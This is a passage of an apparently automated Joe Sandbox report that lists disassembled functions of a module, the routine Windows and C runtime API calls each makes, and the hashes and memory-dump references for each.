Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 51d66a3ea3a1e5720d3031fa8d01ef1f6d3b4a26eee4bfd04239a76c9c1293a5
Instruction ID: 3f6d6d14e40b9dac3be02c67f35518ae7a2f9a2d3096968201de7115f04ad278
Opcode Fuzzy Hash: 51d66a3ea3a1e5720d3031fa8d01ef1f6d3b4a26eee4bfd04239a76c9c1293a5
Instruction Fuzzy Hash: 76318431A1CB9641E7609F25D590178AAA8FB85BB4FAC1339DB6E073E4DF38E491D310

Function 00007FF75996A188 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF75996A005,?,?,00000000,00007FF75996A0BA), ref: 00007FF75996A1F6
GetLastError.KERNEL32(?,?,?,00007FF75996A005,?,?,00000000,00007FF75996A0BA), ref: 00007FF75996A200

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 6fe57093fbbb00cdf8389479e1e18e52ea82cce6ea34632ee61e1d7ac301845a
Instruction ID: 028d487cf2a9a71ebec6d1b60a313ce96698d4501bcd7d7892f99d9c2d9853b9
Opcode Fuzzy Hash: 6fe57093fbbb00cdf8389479e1e18e52ea82cce6ea34632ee61e1d7ac301845a
Instruction Fuzzy Hash: BA21CF21B196C241FE50BF61D990279A2B1AFC47A0FAC4235DA2E472C5CF6CA4848322

Function 00007FF75996B764 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF75996B750,00000000,?,?,?,00007FF759951023,00007FF75996B859), ref: 00007FF75996B7B0
GetLastError.KERNEL32(?,?,?,?,?,00007FF75996B750,00000000,?,?,?,00007FF759951023,00007FF75996B859), ref: 00007FF75996B7BA

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7196098b30ecd42809471233c9619b7315c9fb41ce716e28bdee8d0b35162eb6
Instruction ID: e8de3b58843ac5999db32ea75bdb50c2267dd31c86084eb2f236635d73a82786
Opcode Fuzzy Hash: 7196098b30ecd42809471233c9619b7315c9fb41ce716e28bdee8d0b35162eb6
Instruction Fuzzy Hash: C311C16261CA8281DA10AF26E804169A379AB85BF4F984331EE7D0BBD9DF3CD0548750

Function 00007FF759966AE8 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759966965), ref: 00007FF759966B0B
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF759966965), ref: 00007FF759966B21

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: ac061897d341fb700666fc9327f8304620b74f462cdcac4e9011de69f9e9d462
Instruction ID: 273e3bf6ed018b554aff2d478911083e5a83a7b2791a7d44c36469857906edde
Opcode Fuzzy Hash: ac061897d341fb700666fc9327f8304620b74f462cdcac4e9011de69f9e9d462
Instruction Fuzzy Hash: FA01613251C691C6E750AF25E40123AF7B1FBC5761FA80235F6A9419D4DF3DD050DB24

Function 00007FF759969F78 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F8E
GetLastError.KERNEL32(?,?,?,00007FF759971EC2,?,?,?,00007FF759971EFF,?,?,00000000,00007FF7599723C5,?,?,00000000,00007FF7599722F7), ref: 00007FF759969F98

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 38b70030576bf13f94cd83556ee530387765cecd0e7570bb2763cadcf4087263
Instruction ID: 98dbf666938c3efa7156d0410765a5d404139a1b584e5b21a4b103295e24449a
Opcode Fuzzy Hash: 38b70030576bf13f94cd83556ee530387765cecd0e7570bb2763cadcf4087263
Instruction Fuzzy Hash: EAE0EC50F0E68382FF18BFB6D98517896755FC5741BCD4434D90D5A251EF2CA8898271

Function 00007FF7599670D4 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF7599670D8
GetLastError.KERNEL32 ref: 00007FF7599670E2

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: d9df61864aacf0c38aa57b7a7eccc268b2766f97fd3960567bd6780660c5006e
Instruction ID: bc6c7ac28a4bed4c45987a8588817c7b263e3542d6d2f875d91ceac03a9ff3ce
Opcode Fuzzy Hash: d9df61864aacf0c38aa57b7a7eccc268b2766f97fd3960567bd6780660c5006e
Instruction Fuzzy Hash: BAD0C914E1D64381EA143F75994517995B01FC6721FDC0A34D82D802D0EF1CA0894132

Function 00007FF759966850 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00007FF759966854
GetLastError.KERNEL32(?,?,?,?,?), ref: 00007FF75996685E

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: f10b0acbf04ce372ff2bba8e22346aa2cd94a9581c077f1b6ddec38c1268e9e8
Instruction ID: c1cebdfb9523c1f8ae1670adc05ba06da2c397be7ee403ca1ad76c166d6ed8c9
Opcode Fuzzy Hash: f10b0acbf04ce372ff2bba8e22346aa2cd94a9581c077f1b6ddec38c1268e9e8
Instruction Fuzzy Hash: 5ED01210F1D58381F6147F759C0517C94B02FC6725FD80634C02D812D0EF2CE4894132

Function 00007FF759955DF0 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF759956DB0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 00007FF759956DEA

_findclose.LIBCMT ref: 00007FF759956049

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
Opcode ID: 628285328bb618edcfe9754a4ff814bb64e2feda71a532fcc2d8bd8f687e193b
Instruction ID: 697eaec3a9458717b7f88276fa949ab93a51a8b48642d208568f727be1d04d4a
Opcode Fuzzy Hash: 628285328bb618edcfe9754a4ff814bb64e2feda71a532fcc2d8bd8f687e193b
Instruction Fuzzy Hash: 4F716D52E18AC591E7119F2CD5052FDA370FBE9B48F98E325DB9C12592EF28E2D9C700

Function 00007FF75996B4DC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996B504

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4a6c5a3d4d07d346d85f1dfcc86011b7ee547b027a92df06dc97a85d25961c85
Instruction ID: 0b736469cc200fad9cc83790cb14e96d26c54d52c02c6c295d590a6d1686b49b
Opcode Fuzzy Hash: 4a6c5a3d4d07d346d85f1dfcc86011b7ee547b027a92df06dc97a85d25961c85
Instruction Fuzzy Hash: 2641B43290C28187EA24EF19E5402BDF7B4EB96B94F981131D78E876D5EF2CE402C761

Function 00007FF759956360 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF75995640A

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: f285b20302beaefcf1bb3539b442360c68e2f6062702bb5b73d900193ad1ebd1
Instruction ID: a232cfc140b280c8510719af32b4a1875bfc8e574529bb028c6ca10717ca6435
Opcode Fuzzy Hash: f285b20302beaefcf1bb3539b442360c68e2f6062702bb5b73d900193ad1ebd1
Instruction Fuzzy Hash: 41215E21B086D266EA14BF52A9043BBEA61BF89BD4FCC5430EE0D07786CF7DE4458614

Function 00007FF75996AF6C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996AFF2

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ff4bd6b019ced27284b6fa2760217448de45b7808968d4935831090a049e7df0
Instruction ID: fb401fb57efb72a37fb132568b7045aba853e9c549946c266819940720ebb746
Opcode Fuzzy Hash: ff4bd6b019ced27284b6fa2760217448de45b7808968d4935831090a049e7df0
Instruction Fuzzy Hash: 5B31A162A196C281E711BF5AC84037CAA70AFC0B94FD90139EA1D437D2DF7DE8418772

Function 00007FF759968919 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF759968947

Part of subcall function 00007FF759968A40: GetModuleHandleExW.KERNEL32 ref: 00007FF759968A65
Part of subcall function 00007FF759968A40: GetProcAddress.KERNEL32 ref: 00007FF759968A7B
Part of subcall function 00007FF759968A40: FreeLibrary.KERNEL32 ref: 00007FF759968AA2

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 7474e071a48ef7130f5acd4d7b35ddfbaeb0d66e7037ac086cf5d56d8c80b409
Instruction ID: b43c1a5454fb0e5ae53c914eed97756fe2728c914b9fa2e00d006c3e564dd977
Opcode Fuzzy Hash: 7474e071a48ef7130f5acd4d7b35ddfbaeb0d66e7037ac086cf5d56d8c80b409
Instruction Fuzzy Hash: 4721AE72A047828AEB24AF65C4402FC73B0EB8531DF881A36D76D06AC5DF7CD485CBA1

Function 00007FF759965538 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996549D

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 25f020cec256df429067bb606d051891f0f83e0bb8faa834007163ccabd97c9c
Instruction ID: 0ba916d216a2e2ee853e3152d67453413698e37af0b3663d8f2c70c608de945b
Opcode Fuzzy Hash: 25f020cec256df429067bb606d051891f0f83e0bb8faa834007163ccabd97c9c
Instruction Fuzzy Hash: 4E118122A1D6C181EB60BF52D50027DE270BFC9B80FDC4475EA8C57A8ACF7DD8018761

Function 00007FF7599757DC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7599757FF

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e860bb9bc84c29a06dccfc010b7eb52daf61d2c250f48aeb7393b4a8ace16f10
Instruction ID: f613bd151718bc589ec232705eab40597d4358b4816272117225c49d3098ad1b
Opcode Fuzzy Hash: e860bb9bc84c29a06dccfc010b7eb52daf61d2c250f48aeb7393b4a8ace16f10
Instruction Fuzzy Hash: AF21C632A18A8287EBA1AF18D4403B9B6B0FBC5B54F9C4234E75D876D9DF3CD8018B51

Function 00007FF75995E97C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75995E9D0

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 298f7b2a666c55937c0a4044f00fb88544ba948c427ceaa5fd6043e577695ec0
Instruction ID: 339c320daa26776ef5ae310a71d9e68f57eb667f870d1cefe233299ec8106c52
Opcode Fuzzy Hash: 298f7b2a666c55937c0a4044f00fb88544ba948c427ceaa5fd6043e577695ec0
Instruction Fuzzy Hash: 1401A161A0879151EA54FF92990016EE7A5AFC6FE0F8C4639EEAC17BDACF3DD4118310

Function 00007FF7599664DC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF75996651A

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ec6a8bbc8393b9a035b98e996b47f7bdc6c1af4ae5fba4cb41e2bad1113de79b
Instruction ID: 66f2753fc542e9b0ab60b66502957b7124269fbecd1aa763a9c3e4910f17c798
Opcode Fuzzy Hash: ec6a8bbc8393b9a035b98e996b47f7bdc6c1af4ae5fba4cb41e2bad1113de79b
Instruction Fuzzy Hash: 6001AD60E0D6C241FE607F29E94A139E6B4AFC17D4FCC4135EA1C466CADF2CE8408230

Function 00007FF75996DEB8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF75996AA16,?,?,?,00007FF759969BD3,?,?,00000000,00007FF759969E6E), ref: 00007FF75996DF0D

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69550027ed8e3bf035e7bef6798a6f7658c1153be72ca181ca789a5114add420
Instruction ID: 730741dcb377e6093eaa951a5438e93d23d1781eab007d3a339ba8b96ccb2296
Opcode Fuzzy Hash: 69550027ed8e3bf035e7bef6798a6f7658c1153be72ca181ca789a5114add420
Instruction Fuzzy Hash: 56F06D60F1A29340FE597F66DD502B8D2B45FE5B40FCC4434C91E862D2DF2CE4868230

Function 00007FF75996CC2C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF75995F1E4,?,?,?,00007FF7599606F6,?,?,?,?,?,00007FF75996275D), ref: 00007FF75996CC6A

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b827a7ab023d1767f95784f6f7fefaf86c66ee15463514ccfd07e797832e7771
Instruction ID: e4ad492af0a936d4f440466a2c38f7ff54cc9ef012ce539e7ff797dd588fcd48
Opcode Fuzzy Hash: b827a7ab023d1767f95784f6f7fefaf86c66ee15463514ccfd07e797832e7771
Instruction Fuzzy Hash: FEF05E50B192C640FE157F72994027991B48FC57A0FCC4A34EA2E452D1EF2EE44092B0

Function 00007FF759966818 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF759966831

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff759950000_lib.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d8ddd072cb9aeb27808c6bd09a31392064f42f391621abce153dcee42f6a1f6e
Instruction ID: 38539e1725b7bc90197674d646f3bad9c91df8b460bd35b5438d45b1a05c2e79
Opcode Fuzzy Hash: d8ddd072cb9aeb27808c6bd09a31392064f42f391621abce153dcee42f6a1f6e
Instruction Fuzzy Hash: D2E012A1E092C752FA147EB5C58217891309FD8344FCC4038D948462C7DF1DBC595771

Function 00007FF759956490 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2090004096.00007FF759951000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF759950000, based on PE: true

Associated: 00000005.00000002.2089978420.00007FF759950000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090097587.00007FF75997A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75998D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090226640.00007FF75999C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2090324210.00007FF75999E000.00000002.00000001.01000000.0000000B.sdmpDownload File

